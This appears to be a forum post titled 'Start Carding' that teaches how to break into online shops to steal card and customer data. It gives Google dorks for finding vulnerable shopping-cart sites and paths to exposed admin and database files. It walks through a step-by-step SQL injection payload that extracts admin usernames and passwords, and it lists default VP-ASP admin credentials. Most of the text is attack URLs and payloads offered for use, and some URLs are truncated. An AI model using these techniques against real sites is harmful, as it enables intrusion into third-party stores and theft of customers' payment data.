Start Carding

1. Carding dorks :D
2. (!)
3.  
4. Code:
5.  
6. google.com:--> allinurl:/shop/category.asp/catid=
7. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
8. exploit :--> /admin/dbsetup.asp
9. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
10. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
11. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
12. in db look for access to find pass and user of shop admins.
13.  
14. (2)
15. Code:
16.  
17. google.com:--> allinurl:/commercesql/
18. target looks like :--> www.xxxxx.com/commercesql/xxxxx
19. exploit :--> cgi-bin/commercesql/index.cgi?page=
20. target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
21. target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
22. target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log
23.  
24. (3)
25. Code:
26.  
27. 1/search google: allinurl:"shopdisplayproducts.asp?id=
28. --->http://victim.com/shopdisplayproducts.asp?id=5
29.  
30. 2/find error by adding '
31. --->http://victim.com/shopdisplayproducts.asp?id=5'
32.  
33. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
34.  
35. -If you don't see error then change id to cat
36.  
37. --->http://victim.com/shopdisplayproducts.asp?cat=5'
38.  
39. 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
40.  
41. --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
42.  
43. --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
44.  
45. 4/ add 2,3,4,5,6.......until you see a nice table
46.  
47. add 2
48. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
49. then 3
50. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
51. then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
52.  
53. ...5,6,7,8,9.... untill you see a table. (exp:...47)
54.  
55. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
56. ---->see a table.
57.  
58.  
59. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
60.  
61. --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
62.  
63. 6/Find link admin to login:
64. try this first: http://victim.com/shopadmin.asp
65. or: http://victim.com/shopadmin.asp
66.  
67.  
68. Didn't work? then u have to find yourself:
69.  
70. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
71.  
72. --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
73.  
74.  
75. you'll see something like: ( lot of them)
76.  
77. shopaddmoretocart.asp
78. shopcheckout.asp
79. shopdisplaycategories.asp
80. ..............
81.  
82. then guess admin link by adding the above data untill you find admin links
83.  
84. (4)
85.  
86. Code:
87.  
88. Type: VP-ASP Shopping Cart
89. Version: 5.00
90. Dork = intitle:VP-ASP Shopping Cart 5.00
91. You will find many websites with VP-ASP 5.00 cart software installed
92. Now let's get to the exploit..
93.  
94. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
95. The exploit is : diag_dbtest.asp
96. so do this:
97. ****://***.victim.com/shop/diag_dbtest.asp
98.  
99. A page will appear with something like:
100.  
101. xDatabase
102. shopping140
103.  
104. xDblocation
105. resx
106.  
107. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
108. the most important thing here is xDatabase
109. xDatabase: shopping140
110. ok now the URL will be like this:
111. ****://***.victim.com/shop/shopping140.mdb
112. if you didn't download the Database..
113. Try this while there is dblocation.
114. xDblocation
115. resx
116.  
117. the url will be:
118. ****://***.victim.com/shop/resx/shopping140.mdb
119. If u see the error message you have to try this :
120. ****://***.victim.com/shop/shopping500.mdb
121.  
122. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
123.  
124. inside you should be able to find *** information.
125. and you should even be able to find the admin username and password for the website.
126.  
127. the admin login page is usually located here
128. ****://***.victim.com/shop/shopadmin.asp
129.  
130. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
131.  
132. Username: admin
133. password: admin
134. OR
135. Username: vpasp
136. password: vpasp
137.  
138. This isn´t mine ¬¬